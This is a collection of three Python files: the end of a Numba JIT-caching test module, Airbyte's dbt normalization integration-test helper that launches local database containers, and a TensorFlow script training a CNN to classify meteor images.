"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be pass as argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
if __name__ == '__main__':
unittest.main()
|
dbt_integration_test.py
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
import os
import random
import re
import socket
import string
import subprocess
import sys
import threading
import time
from copy import copy
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
NORMALIZATION_TEST_TARGET = "NORMALIZATION_TEST_TARGET"
NORMALIZATION_TEST_MSSQL_DB_PORT = "NORMALIZATION_TEST_MSSQL_DB_PORT"
NORMALIZATION_TEST_MYSQL_DB_PORT = "NORMALIZATION_TEST_MYSQL_DB_PORT"
NORMALIZATION_TEST_POSTGRES_DB_PORT = "NORMALIZATION_TEST_POSTGRES_DB_PORT"
NORMALIZATION_TEST_CLICKHOUSE_DB_PORT = "NORMALIZATION_TEST_CLICKHOUSE_DB_PORT"
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = []
@staticmethod
def generate_random_string(prefix: str) -> str:
return prefix + DbtIntegrationTest.random_string(5)
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def set_target_schema(self, target_schema: str):
self.target_schema = target_schema
def setup_db(self, destinations_to_test: List[str]):
if DestinationType.POSTGRES.value in destinations_to_test:
self.setup_postgres_db()
if DestinationType.MYSQL.value in destinations_to_test:
self.setup_mysql_db()
if DestinationType.MSSQL.value in destinations_to_test:
self.setup_mssql_db()
if DestinationType.CLICKHOUSE.value in destinations_to_test:
self.setup_clickhouse_db()
def setup_postgres_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_POSTGRES_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
if start_db:
self.db_names.append("postgres")
print("Starting localhost postgres container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"marcosmarxm/postgres-ssl:dev",
"-c",
"ssl=on",
"-c",
"ssl_cert_file=/var/lib/postgresql/server.crt",
"-c",
"ssl_key_file=/var/lib/postgresql/server.key",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for Postgres DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MYSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
if start_db:
self.db_names.append("mysql")
print("Starting localhost mysql container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for MySQL DB to start...15 sec")
time.sleep(15)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mssql_db(self):
start_db = True
if os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_MSSQL_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"username": "SA",
"password": "MyStr0ngP@ssw0rd",
"port": port,
"database": self.target_schema,
"schema": self.target_schema,
}
if start_db:
self.db_names.append("mssql")
print("Starting localhost MS SQL Server container for tests")
command_start_container = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mssql",
"-h",
f"{self.container_prefix}_mssql",
"-e",
"ACCEPT_EULA='Y'",
"-e",
f"SA_PASSWORD='{config['password']}'",
"-e",
"MSSQL_PID='Standard'",
"-p",
f"{config['port']}:1433",
"-d",
"mcr.microsoft.com/mssql/server:2019-GA-ubuntu-16.04",
]
# cmds & parameters
cmd_start_container = " ".join(command_start_container)
wait_sec = 30
# run the docker container
print("Executing: ", cmd_start_container)
subprocess.check_call(cmd_start_container, shell=True)
# wait for service is available
print(f"....Waiting for MS SQL Server to start...{wait_sec} sec")
time.sleep(wait_sec)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"exec",
f"{self.container_prefix}_mssql",
"/opt/mssql-tools/bin/sqlcmd",
"-S",
config["host"],
"-U",
config["username"],
"-P",
config["password"],
"-Q",
f"CREATE DATABASE [{config['database']}]",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mssql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_clickhouse_db(self):
"""
ClickHouse official JDBC driver use HTTP port 8123, while Python ClickHouse
driver uses native port 9000, so we need to open both ports for destination
connector and dbt container respectively.
Ref: https://altinity.com/blog/2019/3/15/clickhouse-networking-part-1
"""
start_db = True
if os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "default",
"password": "",
"ssl": False,
}
if start_db:
self.db_names.append("clickhouse")
print("Starting localhost clickhouse container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_clickhouse",
"--ulimit",
"nofile=262144:262144",
"-p",
"9000:9000", # Python clickhouse driver use native port
"-p",
f"{config['port']}:8123", # clickhouse JDBC driver use HTTP port
"-d",
# so far, only the latest version ClickHouse server image turned on
# window functions
"clickhouse/clickhouse-server:latest",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for ClickHouse DB to start...15 sec")
time.sleep(15)
# Run additional commands to prepare the table
command_create_db = [
"docker",
"run",
"--rm",
"--link",
f"{self.container_prefix}_clickhouse:clickhouse-server",
"clickhouse/clickhouse-client:21.8.10.19",
"--host",
"clickhouse-server",
"--query",
f"CREATE DATABASE IF NOT EXISTS {config['database']}",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/clickhouse.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused port to create a database listening on localhost to run destination-postgres
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the adequate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config["basic_bigquery_config"]
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
if destination_type.value == DestinationType.CLICKHOUSE.value:
# Python ClickHouse driver uses native port 9000, which is different
# from official ClickHouse JDBC driver
clickhouse_config = copy(profiles_config)
clickhouse_config["port"] = 9000
profiles_yaml = config_generator.transform(destination_type, clickhouse_config)
else:
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
@staticmethod
def get_normalization_image(destination_type: DestinationType) -> str:
if DestinationType.MSSQL.value == destination_type.value:
return "airbyte/normalization-mssql:dev"
elif DestinationType.MYSQL.value == destination_type.value:
return "airbyte/normalization-mysql:dev"
elif DestinationType.ORACLE.value == destination_type.value:
return "airbyte/normalization-oracle:dev"
elif DestinationType.CLICKHOUSE.value == destination_type.value:
return "airbyte/normalization-clickhouse:dev"
elif DestinationType.SNOWFLAKE.value == destination_type.value:
return "airbyte/normalization-snowflake:dev"
else:
return "airbyte/normalization:dev"
def dbt_check(self, destination_type: DestinationType, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command(normalization_image, "debug", test_root_dir)
assert self.run_check_dbt_command(normalization_image, "deps", test_root_dir)
def dbt_run(self, destination_type: DestinationType, test_root_dir: str, force_full_refresh: bool = False):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command(normalization_image, "run", test_root_dir, force_full_refresh)
@staticmethod
def run_check_dbt_command(normalization_image: str, command: str, cwd: str, force_full_refresh: bool = False) -> bool:
"""
Run dbt subprocess while checking and counting for "ERROR", "FAIL" or "WARNING" printed in its outputs
"""
if normalization_image.startswith("airbyte/normalization-oracle") or normalization_image.startswith("airbyte/normalization-mysql"):
dbtAdditionalArgs = []
else:
dbtAdditionalArgs = ["--event-buffer-size=10000"]
error_count = 0
commands = (
[
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/logs:/logs",
"-v",
f"{cwd}/build/dbt_packages:/dbt",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
normalization_image,
]
+ dbtAdditionalArgs
+ [
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
)
if force_full_refresh:
commands.append("--full-refresh")
command = f"{command} --full-refresh"
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
"depends on a node named 'disabled_test' which was not found", # Tests throwing warning because it is disabled
"The requested image's platform (linux/amd64) does not match the detected host platform "
+ "(linux/arm64/v8) and no specific platform was requested", # temporary patch until we publish images for arm64
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
@staticmethod
def get_test_targets() -> List[str]:
"""
Returns a list of destinations to run tests on.
if the environment variable NORMALIZATION_TEST_TARGET is set with a comma separated list of destination names,
then the tests are run only on that subsets of destinations
Otherwise tests are run against all destinations
"""
if os.getenv(NORMALIZATION_TEST_TARGET):
target_str = os.getenv(NORMALIZATION_TEST_TARGET)
return [d.value for d in {DestinationType.from_string(s.strip()) for s in target_str.split(",")}]
else:
return [d.value for d in DestinationType]
|
results_2_11_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss, getProblematicMeteors
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_11'
base_dir = 'C:\work_dir\meteorData\extraData_filtered_30_split_70_30'
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution: tuple = (432, 432)
ImageResolutionGrayScale: tuple = (432, 432, 1)
DROPOUT: float = 0.30
EPOCHS: int = 15
LEARNING_RATE: float = 5e-4
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size: int = 16
steps_per_epoch: int = int(training_images / batch_size)
validation_steps: int = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (.3) vs model_2_06 (no dropout) vs model_2_07 (.4) vs model_2_08 (.5):
# model 2.9 -> Simple CNN (5 conv layers + 2 fully-connected) -> Only 123,209 parameters. Training time: 550 s/epoch
# model 2.10 -> 2.9 with filtered data
# model 2.11 -> Very complex CNN + BatchNormalization (???) -> ??? parameters. Training time: ???
model = tf.keras.models.Sequential([
Conv2D(12, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(24, (2, 2), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (2, 2), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Flatten(),
Dense(288, activation='elu', kernel_initializer='he_uniform'),
BatchNormalization(),
#Dropout(DROPOUT),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
BatchNormalization(),
#Dropout(DROPOUT - 0.10),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=LEARNING_RATE)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
#model.load_weights(join('G:\GIEyA\TFG\meteor_classification\\results_2\model_2_02\weights',
# 'model_2_02_acc_0.9049_val_acc_0.8934.h5'))
